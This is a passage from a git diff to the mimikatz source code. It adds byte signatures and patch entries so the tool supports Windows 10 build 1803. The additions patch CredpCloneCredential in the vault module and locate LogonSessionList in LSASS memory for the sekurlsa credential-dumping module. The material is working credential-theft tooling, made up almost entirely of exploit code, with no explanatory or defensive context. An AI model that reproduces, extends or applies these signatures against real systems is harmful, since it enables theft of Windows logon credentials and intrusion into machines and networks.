"../../modules/kull_m_string.h" +#include "../../modules/kull_m_file.h" +#include "../../modules/kull_m_process.h" +#include "../../modules/kull_m_net.h" +#include "../../modules/kull_m_cabinet.h" const KUHL_M kuhl_m_standard; diff --git a/mimikatz/modules/kuhl_m_vault.c b/mimikatz/modules/kuhl_m_vault.c index 5d78e22..e42dc89 100644 --- a/mimikatz/modules/kuhl_m_vault.c +++ b/mimikatz/modules/kuhl_m_vault.c @@ -376,6 +376,7 @@ BYTE PTRN_WN62_CredpCloneCredential[] = {0x44, 0x8b, 0xfa, 0x41, 0x83, 0xe7, 0 BYTE PTRN_WN63_CredpCloneCredential[] = {0x45, 0x8b, 0xf8, 0x44, 0x23, 0xfa}; BYTE PTRN_WN10_1607_CredpCloneCredential[] = {0x45, 0x8b, 0xe0, 0x41, 0x83, 0xe4, 0x01, 0x75}; BYTE PTRN_WN10_1703_CredpCloneCredential[] = {0x45, 0x8b, 0xe6, 0x41, 0x83, 0xe4, 0x01, 0x75}; +BYTE PTRN_WN10_1803_CredpCloneCredential[] = {0x45, 0x8b, 0xfe, 0x41, 0x83, 0xe7, 0x01, 0x75}; BYTE PATC_WNT5_CredpCloneCredentialJmpShort[] = {0x90, 0xe9}; BYTE PATC_WALL_CredpCloneCredentialJmpShort[] = {0xeb}; BYTE PATC_WN64_CredpCloneCredentialJmpShort[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90}; @@ -387,6 +388,7 @@ KULL_M_PATCH_GENERIC CredpCloneCredentialReferences[] = { {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WN64_CredpCloneCredentialJmpShort), PATC_WN64_CredpCloneCredentialJmpShort}, {6}}, {KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_CredpCloneCredential), PTRN_WN10_1607_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}}, {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN10_1703_CredpCloneCredential), PTRN_WN10_1703_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}}, + {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN10_1803_CredpCloneCredential), PTRN_WN10_1803_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}}, }; #elif defined _M_IX86 BYTE PTRN_WNT5_CredpCloneCredential[] = {0x8b, 0x43, 0x04, 0x83, 0xf8, 0x01, 0x74}; diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c index ab83d34..e9c5dc4 100644 --- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c +++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c @@ -12,6 +12,7 @@ BYTE PTRN_WN61_LogonSessionList[] = {0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0 BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05}; BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74}; BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74}; +BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74}; KULL_M_PATCH_GENERIC LsaSrvReferences[] = { {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}}, {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}}, @@ -21,6 +22,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = { {KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {36, -6}}, {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}}, {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN1703_LogonSessionList), PTRN_WN1703_LogonSessionList}, {0, NULL}, {23, -4}}, + {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}}, }; #elif defined _M_IX86 BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};